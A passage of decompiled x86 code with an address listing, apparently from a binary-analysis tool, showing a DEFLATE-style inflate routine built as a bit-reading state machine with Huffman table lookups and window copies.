							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00407458( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004073B0))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004073F0( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004073F0( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432190;
													if(_t416 < 0x432190) {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00407458(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431d10, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431d10 + _t440;
														E00407458(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
														 *0x432e90 =  *0x432e90 + 1;
														__eflags =  *0x432e90;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405EC2( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004073F0( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00407458( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00407458(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004073F0( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406c81
0x00406c81
0x00406c81
0x00406c81
0x00406c81
0x00406c85
0x00000000
0x00000000
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c91
0x00406c96
0x00406c98
0x00406c9b
0x00406c9e
0x00406ca1
0x00406ca1
0x00406ca4
0x00000000
0x00000000
0x00406ca6
0x00406ca6
0x00406ca9
0x00406cae
0x00406cb0
0x00406cb3
0x00406cb9
0x00406a18
0x00406a18
0x00406a1b
0x00406a21
0x00406a27
0x00406a30
0x00406a36
0x00406a39
0x00406a40
0x00406a45
0x00406a4b
0x00406a56
0x00406a56
0x00406cbf
0x00406cbf
0x00406cc9
0x00000000
0x00000000
0x00406ccf
0x00406ccf
0x00406cd3
0x00406cd6
0x00406cd6
0x00406cda
0x00406ce0
0x00406ce0
0x00406ce3
0x00406ce6
0x00406cec
0x00000000
0x00000000
0x00406cee
0x00406d10
0x00406d10
0x00406d13
0x00000000
0x00000000
0x00406cf0
0x00406cf4
0x00000000
0x00000000
0x00406cfa
0x00406cfa
0x00406cfd
0x00406d00
0x00406d05
0x00406d07
0x00406d0a
0x00406d0d
0x00406d0d
0x00406d15
0x00406d15
0x00406d1b
0x00406d1e
0x00406d21
0x00406d21
0x00406d28
0x00406d2c
0x00406d30
0x00406d33
0x00406d36
0x00406d3c
0x00406d41
0x00000000
0x00000000
0x00406d43
0x00406d57
0x00406d57
0x00406d5b
0x00000000
0x00000000
0x00406d45
0x00406d48
0x00406d48
0x00406d4f
0x00406d54
0x00406d54
0x00406d54
0x00406d5d
0x00406d5d
0x00406d60
0x00406d6e
0x00406d74
0x00406d79
0x00406d7f
0x00406d85
0x00406d8b
0x00406d92
0x00406da6
0x00406da6
0x00407375
0x00407375
0x00407375
0x0040737a
0x00000000
0x00000000
0x004069b2
0x004069b2
0x00000000
0x00406fad
0x00406fad
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00000000
0x00000000
0x00406fc0
0x00406fc0
0x00406fe5
0x00406fe5
0x00406fe5
0x00406fe7
0x00000000
0x00000000
0x00406fc5
0x00406fc5
0x00406fc9
0x00000000
0x00000000
0x00406fcf
0x00406fcf
0x00406fd2
0x00406fd5
0x00406fd8
0x00406fda
0x00406fdc
0x00406fdf
0x00406fe2
0x00406fe2
0x00406fe2
0x00406fe9
0x00406fe9
0x00406ff1
0x00406ff4
0x00406ff7
0x00406ffa
0x00406ffe
0x00407001
0x00407003
0x00407006
0x00407008
0x0040701c
0x0040701c
0x0040701f
0x00407039
0x00407039
0x0040703c
0x00000000
0x00000000
0x00407042
0x00407042
0x00407045
0x00000000
0x00000000
0x0040704b
0x0040704b
0x00000000
0x0040704b
0x00407021
0x00407024
0x0040702b
0x0040702e
0x00000000
0x0040702e
0x0040700a
0x0040700e
0x00407011
0x00000000
0x00000000
0x00407056
0x00407056
0x0040707b
0x0040707b
0x0040707b
0x0040707d
0x00000000
0x00000000
0x0040705b
0x0040705b
0x0040705f
0x00000000
0x00000000
0x00407065
0x00407065
0x00407068
0x0040706b
0x0040706e
0x00407070
0x00407072
0x00407075
0x00407078
0x00407078
0x00407078
0x0040707f
0x00407087
0x0040708a
0x0040708d
0x0040708f
0x00407092
0x00407092
0x00407094
0x00407098
0x0040709b
0x0040709e
0x004070a1
0x00000000
0x00000000
0x004070a7
0x004070a7
0x004070cc
0x004070cc
0x004070cc
0x004070ce
0x00000000
0x00000000
